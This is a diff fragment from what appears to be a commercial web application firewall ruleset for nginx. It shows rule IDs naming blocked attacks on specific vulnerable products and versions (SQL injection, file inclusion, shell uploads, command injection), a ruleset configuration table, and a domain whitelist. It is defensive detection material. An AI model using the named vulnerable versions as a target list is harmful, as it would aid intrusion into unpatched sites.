+390683:: Virtual Just In Time Patch: page argument metacharacter injection attack
+390684:: Virtual Just In Time Patch: Zainu SQL Injection Vulnerabilities
+390685:: Virtual Just In Time Patch: PHP id variable SQL injection vulnerability
+390686:: Virtual Just In Time Patch: PHP id variable SQL injection vulnerability
+390690:: Vulnerability scanner attempting response splitting
+390691:: Vulnerability scanner attempting SQL unescape probe
+390692:: Vulnerability scanner attempting XSRF probe
+390737:: Virtual Just In Time Patch: Joomla Image Upload - Arbitrary File Upload
+390744:: Virtual Just In Time Patch: Joomla com aceftp Arbitrary File Download Vulnerability
+390745:: Virtual Just In Time Patch: Known PHP malware
+390746:: Virtual Just In Time Patch: Known Vulnerable Joomla Simple File Upload v1.3 Access blocked
+390747:: Virtual Just In Time Patch: Boost My Campaign 1.1 Unauthenticated Administrative Access blocked
+390749:: Virtual Just In Time Patch: Joomla privilege escalation attack
+390751:: Virtual Just In Time Patch: Wordpress REST API remote code injection attack
+390753:: Virtual Just In Time Patch: Wordpress REST API remote code injection attack
+390755:: Virtual Just In Time Patch: Drupal Code Injection attack blocked
+390756:: Virtual Just In Time Patch: Oscommerce Exploit
+390757:: Virtual Just In Time Patch: e107 PHP code injection vulnerability
+390758:: Virtual Just In Time Patch: Sulata iSoft Local File Disclosure Exploit
+390759:: Virtual Just In Time Patch: SQL Injection Exploit
+390760:: Virtual Just In Time Patch: RFI Injection Exploit
+390761:: Virtual Just In Time Patch: RFI Injection Exploit
+390766:: Virtual Just In Time Patch: Drupal Code Injection attack blocked
+390767:: Virtual Just In Time Patch: Drupal Code Injection attack blocked
+390768:: Virtual Just In Time Patch: PHP Code Injection attack blocked
+390769:: Virtual Just In Time Patch: WordPress Theme Newspaper 6.7.1 - Privilege Escalation attack
+390770:: Virtual Just In Time Patch: Cars Portal SQL Injection
+390775:: Virtual Just In Time Patch: TClanPortal id SQL Injection Vulnerability
+390849:: Virtual Just In Time Patch: PHPMailer remote code execution attack
+391104:: Virtual Just In Time Patch: aWebBB SQL attack
+391235:: Virtual Just In Time Patch: Drupal pre-auth SQL injection attack
+391487:: Virtual Just In Time Patch: Attempted hsh.mdb file access
+391653:: Virtual Just In Time Patch: Possible OpenMRS Remote code injection 
+391662:: Virtual Just In Time Patch: Module user SQL Injection Vulnerability
+391663:: Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability
+391664:: Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability Probe
+391709:: Virtual Just In Time Patch:  Easy Hosting Control Panel Unauthenticated File upload attack denied
+391739:: Virtual Just In Time Patch:  Easy Hosting Control Panel plaintext password attack denied
+391740:: Virtual Just In Time Patch:  WordPress WP Mobile Detector 3.5 Shell Upload
+391741:: Virtual Just In Time Patch:  Roxy File Manager Shell Upload Attack
+391742:: Virtual Just In Time Patch:  Wordpress Gravity Forms 1.8.19 Shell Upload Attack
+391743:: Virtual Just In Time Patch:  Wordpress Gravity Forms 1.8.19 Shell Upload Attack
+391744:: Virtual Just In Time Patch: SugarCRM PHP Code injection attack
+391745:: Virtual Just In Time Patch: SugarCRM Insecure fopen attack
+391746:: Virtual Just In Time Patch: phpCollab 2.5.1 Unauthenticated File Upload blocked
+391747:: Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload
+391748:: Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload
+391749:: Virtual Just In Time Patch: Advertisement board Joomla classifieds extension 3.2.0 - Remote Shell Upload Vulnerability  blocked
+391756:: Virtual Just In Time Patch: WP Cherry Plugin Unauthenticated File Upload blocked
+391759:: Virtual Just In Time Patch: PerfexCRM 1.9.7 a Unrestricted php5 File upload blocked
+391760:: Virtual Just In Time Patch: RFI Injection Exploit
+392657:: Virtual Just In Time Patch: login.cgi command injection blocked
+392658:: Virtual Just In Time Patch: CGI command injection blocked
+392659:: Virtual Just In Time Patch: Cyphor Forum SQL Injection Exploit
+392664:: Virtual Just In Time Patch: Joomla Privilige Escalation Vulnerability
+392665:: Virtual Just In Time Patch: Joomla Privilige Escalation Vulnerability
+392765:: Virtual Just In Time Patch: Naive Java application cross scripting attack 
+392767:: Virtual Just In Time Patch: Possible BIG_IP attack
+393134:: Virtual Just In Time Patch: Test.fcgi or test.cgi access
+393204:: Virtual Just In Time Patch: Joomla token exploit
+393300:: Virtual Just In Time Patch: Peel rubid SQL Injection Vulnerability
+393376:: Virtual Just In Time Patch: Generic mosConfig_absolute_path File Inclusion Vulnerability
+393382:: Virtual Just In Time Patch: tikiwiki Remote File Inclusion Vulnerability
+393485:: Virtual Just In Time Patch: Sukru Alatas Guestbook Exposure of user Credentials
+393602:: Virtual Just In Time Patch: Joomla option argument illegal character injection
+393615:: Virtual Just In Time Patch: MyBulletinBoard SQL injection
+393651:: Virtual Just In Time Patch: Possible XSS injection in contactus application comments
+393652:: Virtual Just In Time Patch: JAMWiki message Cross-Site Scripting Vulnerability
+393657:: Virtual Just In Time Patch: Saxon XSLT command execution attacks
+393658:: Virtual Just In Time Patch: Saxon XSLT command execution attacks
+393659:: Virtual Just In Time Patch: Orca Blog SQL injection Vulnerability
+393663:: Virtual Just In Time Patch: Possible Wordpress CM Download Manager RCE attempt
+393664:: Virtual Just In Time Patch: Wordpress Gravity Forms upload attack
+393665:: Virtual Just In Time Patch:Possible W3TC and WP Super Cache PHP Code injection attempt
+393666:: Virtual Just In Time Patch: Possible Wordpress brute force attempt, direct Login Missing Referer (not blocked)
+393669:: Virtual Just In Time Patch: Possible DOS attack
+393677:: Virtual Just In Time Patch: tikiwiki listpages mysql passwd disclosure attempt
+393719:: Virtual Just In Time Patch: CouchCMS 1.4.5: Code Execution attack blocked
+393720:: Virtual Just In Time Patch:  Grawlix 1.0.3: Code Execution 
+393721:: Virtual Just In Time Patch:  Yeager CMS SSRF attack blocked 
+393723:: Virtual Just In Time Patch:  Wordpress Blind SQLi POC blocked
+393724:: Virtual Just In Time Patch:  Wordpress Privilege Escalation attack blocked
+393725:: Virtual Just In Time Patch:  Wordpress WP User Frontend Plugin Unrestricted File Upload blocked
+393726:: Virtual Just In Time Patch:  Wordpress WooCommerce Privilege Escalation
+393727:: Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked
+393728:: Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked
+393734:: Virtual Just In Time Patch:  Yeager CMS unauthenticated upload blocked
+393737:: Virtual Just In Time Patch:  PHP utility belt access denied
+393738:: Virtual Just In Time Patch:  Zenphoto RFI attack denied
+393739:: Virtual Just In Time Patch:  PivotX shell upload attack denied
+393743:: Virtual Just In Time Patch: WordPress Service Finder Booking Local File Disclosure blocked
+393749:: Virtual Just In Time Patch: WordPress html2canvas proxy SSRF attack blocked
+393750:: Virtual Just In Time Patch: WordPress ajax_asyn_link LFI attack blocked
+393751:: Virtual Just In Time Patch: WordPress 301bulkoptions attack blocked
+393752:: Virtual Just In Time Patch: LFI attack blocked
+393753:: Virtual Just In Time Patch: LFI attack blocked
+393754:: Virtual Just In Time Patch: PHP code injection attack blocked
+393756:: Virtual Just In Time Patch:e107 RFI attack
+393758:: Virtual Just In Time Patch: WordPress backup manager LFI attack blocked
+393759:: Virtual Just In Time Patch: WordPress backup manager LFI attack blocked
+393760:: Virtual Just In Time Patch: OPAC RSS Search SQL injection  attack blocked
+393766:: Virtual Just In Time Patch: semalt.com bot attempt
+393767:: Virtual Just In Time Patch: Arbitrary File Upload Vulnerability in Jssor Slider attack blocked
+393768:: Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked
+393769:: Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked
+393771:: Virtual Just In Time Patch: WordPress shortcode LFI attack blocked
+393772:: Virtual Just In Time Patch: WordPress adaptive-images-script.php LFI attack blocked
+393780:: Virtual Just In Time Patch: WordPress Possible TC custom javscript injection attack blocked
+393781:: Virtual Just In Time Patch: WordPress File Manager Plugin attack blocked
+393782:: Virtual Just In Time Patch: PGP eval stdin attack blocked
+394150:: Virtual Just In Time Patch: ff_compath File Inclusion Vulnerabilities
+394666:: Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt
+394667:: Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt
+394669:: Virtual Just In Time Patch: Shenzhen TVT Digital Technology Co. Ltd &amp; OEM {DVR/NVR/IPC} API RCE attempt blocked
+395760:: Virtual Just In Time Patch: RFI Injection Exploit
+397678:: Virtual Just In Time Patch: Access to unauthenticated BackupBuddy backup file.  Not blocked.
+397679:: Virtual Just In Time Patch: Unauthorized attempt to access insecure BackupBuddy backup.
+397680:: Virtual Just In Time Patch: Attempt to exploit command injection vulnerability in Gitorious.
+360009::Atomicorp.com Malicious Domain Output Detector:  Malware domain detected in webserver output and NOT BLOCKED.  This means your system may be serving up malware.
+351000::Atomicorp.com Upload Malware Scanner: Malicious File upload attempt detected and blocked
+350052:: Threat Intelligence Match for Spamming Source on Atomicorp Threat Intelligence RBL.  See this URL for details http://www.atomicrbl.com (Previous TI-2 Match)
+350053:: Threat Intelligence Match for known Brute Force attacker on Atomicorp Threat Intelligence RBL.  See this URL for details http://www.atomicrbl.com (Previous TI-3 Match)
+350054:: Threat Intelligence Match for known Attacker source on Atomicorp Threat Intelligence RBL.  See this URL for details http://www.atomicrbl.com (Previous TI-4 Match)
+350055:: Threat Intelligence Match for known multi event Attacker source on Atomicorp Threat Intelligence RBL.  See this URL for details http://www.atomicrbl.com (Previous TI-5 Match)
+355501:: Threat Intelligence Match for Spamming Source on Atomicorp Threat Intelligence RBL (TI-2).  See this URL for details http://www.atomicrbl.com
+355503:: Threat Intelligence Match for known Brute Force attacker on Atomicorp Threat Intelligence RBL (TI-3).  See this URL for details http://www.atomicrbl.com
+355504:: Threat Intelligence Match for Known attacker Source on Atomicorp Threat Intelligence RBL (TI-4).  See this URL for details http://www.atomicrbl.com
+355506:: Threat Intelligence Match for Known multi event attacker Source on Atomicorp Threat Intelligence RBL.  See this URL for details http://www.atomicrbl.com
diff --git a/nginx-waf/waf_rule_config b/nginx-waf/waf_rule_config
new file mode 100644
index 0000000..2a4a4f3
--- /dev/null
+++ b/nginx-waf/waf_rule_config
@@ -0,0 +1,62 @@
+# WAF version, Description, Filename, Config Token, Default, Severity 
+2.5.12,NULL,00_asl_0_global.conf,NULL,yes,NULL,NULL,NULL
+2.5.12,NULL,malware-blacklist.txt,NULL,yes,NULL,NULL,NULL
+2.5.12,RBL Ruleset,00_asl_rbl.conf,MODSEC_00_RBL,no,low,NULL,NULL
+2.7.0,Bogus Search Engine Ruleset,00_asl_y_searchengines.conf,MODSEC_00_SEARCHENGINE,no,high,replaced-by-lua,2.9.0
+2.6.6,Autowhitelist Search Engine Ruleset,00_asl_x_searchengines.conf,MODSEC_00_AUTOWHITELIST_SEARCHENGINE,no,low,NULL,2.9.0
+2.6.1,Antievasion Ruleset,00_asl_z_antievasion.conf,MODSEC_00_ANTIEVASION,yes,high,NULL,NULL
+2.7.0,Strict Multiform Ruleset,00_asl_zz_strict.conf,MODSEC_00_STRICT,yes,moderate,NULL,NULL
+2.7.7,Threat Intelligence Ruleset,00_asl_z_aa_threat_intelligence.conf,MODSEC_00_THREAT,no,moderate,NULL,NULL
+2.7.7,NULL,999_asl_threat_intelligence.conf,MODSEC_00_THREAT,no,moderate,NULL,NULL
+2.7.7,NULL,99_asl_zzzz_threat_intelligence.conf,MODSEC_00_THREAT,no,moderate,NULL,NULL
+2.5.12,Whitelist Ruleset,00_asl_whitelist.conf,MODSEC_00_WHITELIST,no,pass,NULL,NULL
+2.5.12,Whitelist Ruleset,00_asl_accesslist.conf,MODSEC_00_ACCESSLIST,no,pass,NULL,NULL
+2.9.0,Blacklist Ruleset,00_asl_blacklist.conf,MODSEC_00_BLACKLIST,no,pass,NULL,NULL
+2.6.3,Advanced Antievasion Ruleset,01_asl_content.conf,MODSEC_01_RULES,yes,high,NULL,NULL
+2.9.0,NULL,01_asl_content_z.conf,MODSEC_01_RULES,yes,high,NULL,NULL
+2.7.8,Custom Domain block Ruleset,01_asl_domain_blocks.conf,MODSEC_01_DOMAIN_BLOCKS,no,pass,NULL,NULL
+2.7.2,Slow Denial of Service Protection,03_asl_dos.conf,MODSEC_03_DOS,yes,high,NULL,NULL
+2.9.0,Custom User Defined Honeypot Ruleset,06_asl_honeypot.conf,MODSEC_06_HONEYPOT,no,pass,NULL,NULL
+2.9.0,NULL,honeypot-files.txt,MODSEC_06_HONEYPOT,no,pass,NULL,NULL
+2.7.2,NULL,000000_asl_modreqtimeout.conf,MODSEC_03_DOS,yes,high,NULL,NULL
+2.5.12,Exclude Ruleset,05_asl_exclude.conf,NULL,yes,pass,NULL,NULL
+2.5.12,Anti-Malware Ruleset,10_asl_antimalware.conf,MODSEC_10_ANTIMALWARE,yes,high,NULL,NULL
+2.7.3,Application Specific Rules,01_asl_rules_special.conf,MODSEC_01_APP_RULES,no,low,NULL,NULL
+2.9.0,Generic Attack Ruleset,10_asl_rules.conf,MODSEC_10_RULES,yes,high,NULL,NULL
+2.6.1,NULL,09_asl_rules.conf,MODSEC_10_RULES,yes,high,NULL,NULL
+2.5.12,NULL,sql.txt,MODSEC_10_RULES,yes,high,NULL,NULL
+2.9.1,NULL,os_files.txt,MODSEC_10_RULES,yes,high,NULL,NULL
+2.6.3,NULL,11_asl_rules.conf,MODSEC_10_RULES,yes,high,NULL,NULL
+2.9.2,Advanced Attack Ruleset,11_asl_adv_rules.conf,MODSEC_11_ADV_RULES,yes,high,NULL,NULL
+2.9.2,Advanced Attack Ruleset,php_variables.txt,MODSEC_11_ADV_RULES,yes,high,NULL,NULL
+2.9.2,Advanced Attack Ruleset,php_function_names.txt,MODSEC_11_ADV_RULES,yes,high,NULL,NULL
+2.6.1,Data Loss Protection Ruleset,11_asl_data_loss.conf,MODSEC_11_DLP,no,moderate,NULL,NULL
+2.9.1,Brute Force Protection Ruleset,12_asl_brute.conf,MODSEC_12_BRUTE,yes,moderate,NULL,NULL
+2.9.2,Advanced Command Injection Ruleset,13_asl_command_injection.conf,MODSEC_13_ADV_CMD,no,moderate,NULL,NULL
+2.9.1,Supplemental Brute Force Protection Ruleset,11_asl_brute_enhanced.conf,MODSEC_11_BRUTE,no,low,NULL,NULL
+2.9.1,NULL,13_asl_brute_enhanced.conf,MODSEC_11_BRUTE,no,low,NULL,NULL
+2.9.0,Advanced XSS Protection Ruleset,12_asl_adv_xss_rules.conf,MODSEC_12_ADV_XSS_RULES,yes,moderate,NULL,NULL
+2.5.12,Malicious Useragents Ruleset,20_asl_useragents.conf,MODSEC_20_USERAGENTS,yes,low,NULL,NULL
+2.9.0,User Defined Malicious Useragents Ruleset,21_asl_useragents.conf,MODSEC_21_USERAGENTS,no,pass,NULL,NULL
+2.9.0,NULL,bad_agents.txt,MODSEC_21_USERAGENTS,no,pass,NULL,NULL
+2.5.12,Anti-Spam Ruleset,30_asl_antispam.conf,MODSEC_30_ANTISPAM,no,low,NULL,NULL
+2.5.12,NULL,domain-spam-whitelist.txt,MODSEC_30_ANTISPAM,no,low,NULL,NULL
+# retired for the .txt extension
+2.5.12,NULL,domain-spam-whitelist.conf,MODSEC_30_ANTISPAM,no,low,NULL,NULL
+2.5.12,NULL,domain-blacklist.txt,MODSEC_30_ANTISPAM,no,low,NULL,NULL
+2.5.12,NULL,spam.data,MODSEC_30_ANTISPAM,no,low,NULL,NULL
+2.6.2,Anti-Spam URI RBL Ruleset,31_asl_urispam.conf,MODSEC_31_ANTISPAM_URI,no,low,NULL,NULL
+2.5.12,Rootkit Detection Ruleset,50_asl_rootkits.conf,MODSEC_50_ROOTKITS,yes,low,NULL,NULL
+2.5.12,NULL,51_asl_rootkits.conf,MODSEC_50_ROOTKITS,yes,low,NULL,NULL
+2.5.12,Extra Wordpress Protection Ruleset,51_asl_wordpress_extra.conf,MODSEC_51_WORDPRESS,no,low,NULL,NULL
+2.5.12,NULL,malware_names.txt,MODSEC_50_ROOTKITS,yes,low,NULL,NULL
+2.5.12,Reconnaissance Attacks Ruleset,60_asl_recons.conf,MODSEC_60_RECONS,no,low,NULL,NULL
+2.5.12,Data Leak Prevention Ruleset,61_asl_recons_dlp.conf,MODSEC_61_RECONS_DLP,yes,low,NULL,NULL
+2.7.5,Advanced Malware Removal Ruleset,98_asl_adv_redactor.conf,MODSEC_98_ADV_REDACTOR,no,moderate,NULL,NULL
+2.5.12,NULL,99_asl_exclude.conf,NULL,yes,NULL,NULL,NULL
+2.5.12,Just In Time Patches,99_asl_jitp.conf,MODSEC_99_JITP,yes,high,NULL,NULL
+2.5.12,Basic Malware Removal Ruleset,99_asl_redactor.conf,MODSEC_99_REDACTOR,no,moderate,NULL,NULL
+2.5.12,Malicious Output Detector,99_asl_redactor_post.conf,MODSEC_99_MALWARE_OUTPUT,no,moderate,NULL,NULL
+2.5.12,NULL,99_asl_a_redactor.conf,MODSEC_99_MALWARE_OUTPUT,no,moderate,NULL,NULL
+2.5.12,Web Malware Upload Scanner,99_asl_scanner.conf,MODSEC_99_SCANNER,no,high,NULL,NULL
+2.9.0,NULL,98_asl_scanner.conf,MODSEC_99_SCANNER,no,high,NULL,NULL
diff --git a/nginx-waf/whitelist.txt b/nginx-waf/whitelist.txt
new file mode 100644
index 0000000..1f49a50
--- /dev/null
+++ b/nginx-waf/whitelist.txt
@@ -0,0 +1,76 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2013-2021 by Atomic Corpate Industries Inc. , all rights reserved.
+# Copyright 2005-2013 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is 
+# prohibited unless prior written permission is obtained from the 
+# copyright holder. 
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+127.0.0.1
+3721.com
+amazon.com
+americinn.com
+atomicorp.com
+atomicorp.com
+atomicsecuredlinux.com
+attacker.com
+.authorize.net
+badguy.com
+bing.com
+bit.ly
+blogger.com
+dailymotion.com
+doiop.com
+domain.com
+doubleclick.net
+.dropbox.com
+dwarfurl.com
+example.com
+goo.gl
+google.com
+.googlesyndication.com
+gotroot.com
+h1.ripway.com
+memurl.com
+nonumber.nl
+nopaste.me
+owned-nets.blogspot.com
+pastebin.com
+pastie.org
+progllc.com
+rapidshare.com
+readthisurl.com
+sf.net
+shaunroot.net
+site.com
+technorati.com
+test.com
+tinyurl.com
+twitter.com
+w3.org
+wp.me
+yandex.ru